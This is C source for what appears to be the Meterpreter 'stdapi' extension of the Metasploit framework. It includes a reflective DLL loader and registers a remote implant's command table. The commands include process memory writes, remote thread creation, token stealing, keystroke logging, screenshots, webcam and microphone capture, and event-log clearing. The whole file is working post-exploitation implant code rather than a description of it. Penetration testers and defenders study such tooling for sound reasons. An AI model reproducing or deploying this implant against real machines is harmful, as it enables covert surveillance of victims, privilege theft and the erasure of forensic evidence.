/*
* This module provides access to the standard API of the machine in some
* regards
*/
#include "precomp.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#ifdef _WIN32
#include "../../../ReflectiveDLLInjection/ReflectiveLoader.c"
#endif
// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
// General
extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
Command customCommands[] =
{
// General
COMMAND_REQ( "core_channel_open", request_general_channel_open ),
#ifdef WIN32
// Railgun
COMMAND_REQ( "stdapi_railgun_api", request_railgun_api ),
COMMAND_REQ( "stdapi_railgun_api_multi", request_railgun_api_multi ),
COMMAND_REQ( "stdapi_railgun_memread", request_railgun_memread ),
COMMAND_REQ( "stdapi_railgun_memwrite", request_railgun_memwrite ),
#endif
// Fs
COMMAND_REQ( "stdapi_fs_ls", request_fs_ls ),
COMMAND_REQ( "stdapi_fs_getwd", request_fs_getwd ),
COMMAND_REQ( "stdapi_fs_chdir", request_fs_chdir ),
COMMAND_REQ( "stdapi_fs_mkdir", request_fs_mkdir ),
COMMAND_REQ( "stdapi_fs_delete_dir", request_fs_delete_dir ),
COMMAND_REQ( "stdapi_fs_delete_file", request_fs_delete_file ),
COMMAND_REQ( "stdapi_fs_separator", request_fs_separator ),
COMMAND_REQ( "stdapi_fs_stat", request_fs_stat ),
COMMAND_REQ( "stdapi_fs_file_expand_path", request_fs_file_expand_path ),
COMMAND_REQ( "stdapi_fs_file_move", request_fs_file_move ),
COMMAND_REQ( "stdapi_fs_md5", request_fs_md5 ),
COMMAND_REQ( "stdapi_fs_sha1", request_fs_sha1 ),
#ifdef _WIN32
COMMAND_REQ( "stdapi_fs_search", request_fs_search ),
#endif
// Process
COMMAND_REQ( "stdapi_sys_process_attach", request_sys_process_attach ),
COMMAND_REQ( "stdapi_sys_process_close", request_sys_process_close ),
COMMAND_REQ( "stdapi_sys_process_execute", request_sys_process_execute ),
COMMAND_REQ( "stdapi_sys_process_kill", request_sys_process_kill ),
COMMAND_REQ( "stdapi_sys_process_get_processes", request_sys_process_get_processes ),
COMMAND_REQ( "stdapi_sys_process_getpid", request_sys_process_getpid ),
COMMAND_REQ( "stdapi_sys_process_get_info", request_sys_process_get_info ),
COMMAND_REQ( "stdapi_sys_process_wait", request_sys_process_wait ),
#ifdef _WIN32
// Image
COMMAND_REQ( "stdapi_sys_process_image_load", request_sys_process_image_load ),
COMMAND_REQ( "stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address ),
COMMAND_REQ( "stdapi_sys_process_image_unload", request_sys_process_image_unload ),
COMMAND_REQ( "stdapi_sys_process_image_get_images", request_sys_process_image_get_images ),
// Memory
COMMAND_REQ( "stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate ),
COMMAND_REQ( "stdapi_sys_process_memory_free", request_sys_process_memory_free ),
COMMAND_REQ( "stdapi_sys_process_memory_read", request_sys_process_memory_read ),
COMMAND_REQ( "stdapi_sys_process_memory_write", request_sys_process_memory_write ),
COMMAND_REQ( "stdapi_sys_process_memory_query", request_sys_process_memory_query ),
COMMAND_REQ( "stdapi_sys_process_memory_protect", request_sys_process_memory_protect ),
COMMAND_REQ( "stdapi_sys_process_memory_lock", request_sys_process_memory_lock ),
COMMAND_REQ( "stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock ),
// Thread
COMMAND_REQ( "stdapi_sys_process_thread_open", request_sys_process_thread_open ),
COMMAND_REQ( "stdapi_sys_process_thread_create", request_sys_process_thread_create ),
COMMAND_REQ( "stdapi_sys_process_thread_close", request_sys_process_thread_close ),
COMMAND_REQ( "stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads ),
COMMAND_REQ( "stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend ),
COMMAND_REQ( "stdapi_sys_process_thread_resume", request_sys_process_thread_resume ),
COMMAND_REQ( "stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate ),
COMMAND_REQ( "stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs ),
COMMAND_REQ( "stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs ),
// Registry
COMMAND_REQ( "stdapi_registry_load_key", request_registry_load_key ),
COMMAND_REQ( "stdapi_registry_unload_key", request_registry_unload_key ),
COMMAND_REQ( "stdapi_registry_open_key", request_registry_open_key ),
COMMAND_REQ( "stdapi_registry_open_remote_key", request_registry_open_remote_key ),
COMMAND_REQ( "stdapi_registry_create_key", request_registry_create_key ),
COMMAND_REQ( "stdapi_registry_enum_key", request_registry_enum_key ),
COMMAND_REQ( "stdapi_registry_delete_key", request_registry_delete_key ),
COMMAND_REQ( "stdapi_registry_close_key", request_registry_close_key ),
COMMAND_REQ( "stdapi_registry_set_value", request_registry_set_value ),
COMMAND_REQ( "stdapi_registry_query_value", request_registry_query_value ),
COMMAND_REQ( "stdapi_registry_query_class", request_registry_query_class ),
COMMAND_REQ( "stdapi_registry_enum_value", request_registry_enum_value ),
COMMAND_REQ( "stdapi_registry_delete_value", request_registry_delete_value ),
#endif
// Sys/config
COMMAND_REQ( "stdapi_sys_config_getuid", request_sys_config_getuid ),
COMMAND_REQ( "stdapi_sys_config_sysinfo", request_sys_config_sysinfo ),
COMMAND_REQ( "stdapi_sys_config_rev2self", request_sys_config_rev2self ),
COMMAND_REQ( "stdapi_sys_config_getprivs", request_sys_config_getprivs ),
#ifdef _WIN32
COMMAND_REQ( "stdapi_sys_config_steal_token", request_sys_config_steal_token ),
COMMAND_REQ( "stdapi_sys_config_drop_token", request_sys_config_drop_token ),
#endif
// Net
COMMAND_REQ( "stdapi_net_config_get_routes", request_net_config_get_routes ),
COMMAND_REQ( "stdapi_net_config_add_route", request_net_config_add_route ),
COMMAND_REQ( "stdapi_net_config_remove_route", request_net_config_remove_route ),
COMMAND_REQ( "stdapi_net_config_get_interfaces", request_net_config_get_interfaces ),
COMMAND_REQ( "stdapi_net_config_get_arp_table", request_net_config_get_arp_table ),
COMMAND_REQ( "stdapi_net_config_get_netstat", request_net_config_get_netstat ),
#ifdef WIN32
// Resolve
COMMAND_REQ( "stdapi_net_resolve_host", request_resolve_host ),
COMMAND_REQ( "stdapi_net_resolve_hosts", request_resolve_hosts ),
#endif
// Socket
COMMAND_REQ( "stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown ),
#ifdef _WIN32
// UI
COMMAND_REQ( "stdapi_ui_enable_mouse", request_ui_enable_mouse ),
COMMAND_REQ( "stdapi_ui_enable_keyboard", request_ui_enable_keyboard ),
COMMAND_REQ( "stdapi_ui_get_idle_time", request_ui_get_idle_time ),
COMMAND_REQ( "stdapi_ui_start_keyscan", request_ui_start_keyscan ),
COMMAND_REQ( "stdapi_ui_stop_keyscan", request_ui_stop_keyscan ),
COMMAND_REQ( "stdapi_ui_get_keys", request_ui_get_keys ),
COMMAND_REQ( "stdapi_ui_desktop_enum", request_ui_desktop_enum ),
COMMAND_REQ( "stdapi_ui_desktop_get", request_ui_desktop_get ),
COMMAND_REQ( "stdapi_ui_desktop_set", request_ui_desktop_set ),
COMMAND_REQ( "stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot ),
// Event Log
COMMAND_REQ( "stdapi_sys_eventlog_open", request_sys_eventlog_open ),
COMMAND_REQ( "stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords ),
COMMAND_REQ( "stdapi_sys_eventlog_read", request_sys_eventlog_read ),
COMMAND_REQ( "stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest ),
COMMAND_REQ( "stdapi_sys_eventlog_clear", request_sys_eventlog_clear ),
COMMAND_REQ( "stdapi_sys_eventlog_close", request_sys_eventlog_close ),
// Power
COMMAND_REQ( "stdapi_sys_power_exitwindows", request_sys_power_exitwindows ),
// Webcam
COMMAND_REQ( "webcam_list", request_webcam_list ),
COMMAND_REQ( "webcam_start", request_webcam_start ),
COMMAND_REQ( "webcam_get_frame", request_webcam_get_frame ),
COMMAND_REQ( "webcam_stop", request_webcam_stop ),
// Audio
COMMAND_REQ( "webcam_audio_record", request_ui_record_mic ),
#endif
COMMAND_TERMINATOR
};
/*
* Initialize the server extension
*/
#ifdef _WIN32
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
#else
DWORD InitServerExtension(Remote *remote)
#endif
{
DWORD index;
#ifdef _WIN32
hMetSrv = remote->hMetSrv;
#endif
command_register_all( customCommands );
return ERROR_SUCCESS;
}
/*
* Deinitialize the server extension
*/
#ifdef _WIN32
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
#else
DWORD DeinitServerExtension(Remote *remote)
#endif
{
command_deregister_all( customCommands );
return ERROR_SUCCESS;
}